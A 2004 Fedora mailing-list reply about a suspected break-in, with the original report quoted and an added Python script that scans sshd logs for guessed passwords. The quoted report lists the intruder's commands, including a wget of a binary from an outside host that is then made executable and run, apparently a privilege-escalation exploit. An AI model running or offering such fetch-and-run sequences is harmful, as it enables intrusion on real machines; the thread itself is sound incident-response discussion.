Re: Vulnerability on FC3T2 ? Present in FC3 ?

And how does this prove that there is a vulnerability in Fedora and not that you have poor security?

According to the URLs you post, someone has installed a rootkit.  Unlucky.  But they had to get it there first.

You should first discover how they got onto your machine.  You will need to check a lot more logs than just wtmp.  Try secure and messages as well.  Maybe someone guessed your password.  I really hope that you have firewalled that IP range out to help prevent further trouble from that IP range (assuming though the hacker isn't bouncing from compromised machine to compromised machine).  Also, you might want to consider who has had or might have had physical access to your machine (if that is possible).

Pointing the finger at Fedora without real proof is pointless.


On Mon, 2004-11-22 at 02:14 +0000, richard mullens wrote:
Someone logged into my system on 13 Nov 2004
I found the following in /var/log/wtmp

207-36-180-20.prt.primarydns.com
demo.allegientsystems.com

My user password was changed - but not the root password - and the 
following commands had been executed:-

w
uname -a
cat /etc/issue
cd /tmp
wget chebeleu.com/local
chmod +x local
./local -d -r
./local -d -r
lunx
lynx

There is a similar report dated 10-Nov-2004 at 
http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631
where someone suggested it might be the exploit at 
http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php

Anybody know any more ?
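
Added example, not part of the original messages: one way to follow the reply's advice to check /var/log/secure for a guessed password, by flagging any password login that succeeds right after a run of failures from the same address. The log lines, usernames and addresses are constructed samples in sshd syslog format, and the threshold of 3 is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample in /var/log/secure (sshd syslog) format; not data from the thread.
SAMPLE_SECURE = """\
Nov 13 03:12:01 host sshd[2101]: Failed password for illegal user test from 192.0.2.10 port 40001 ssh2
Nov 13 03:12:04 host sshd[2103]: Failed password for demo from 192.0.2.10 port 40002 ssh2
Nov 13 03:12:07 host sshd[2105]: Failed password for demo from 192.0.2.10 port 40003 ssh2
Nov 13 03:12:11 host sshd[2107]: Accepted password for demo from 192.0.2.10 port 40004 ssh2
Nov 13 09:30:00 host sshd[2300]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Nov 13 09:30:08 host sshd[2302]: Accepted password for alice from 198.51.100.7 port 51001 ssh2
Nov 13 10:00:00 host sshd[2400]: Accepted publickey for alice from 198.51.100.7 port 51002 ssh2
"""

# Older OpenSSH logs unknown accounts as "illegal user", newer as "invalid user".
EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:(?:illegal|invalid) user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def guessed_logins(lines, threshold=3):
    """Return (ip, user, failures) for each password login that succeeded
    after at least `threshold` consecutive failures from the same address."""
    failures = defaultdict(int)   # ip -> failures since its last success
    hits = []
    for line in lines:
        m = EVENT.search(line)
        if not m:
            continue              # publickey logins and non-sshd lines are ignored
        ip = m.group("ip")
        if m.group("result") == "Failed":
            failures[ip] += 1
            continue
        if failures[ip] >= threshold:
            hits.append((ip, m.group("user"), failures[ip]))
        failures[ip] = 0          # a success resets the run for that address
    return hits

if __name__ == "__main__":
    for ip, user, count in guessed_logins(SAMPLE_SECURE.splitlines()):
        print(f"{ip}: login as {user} after {count} failed attempts")
```

Rotated files (secure.1 and so on) need the same pass, since the failures may predate the current log.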

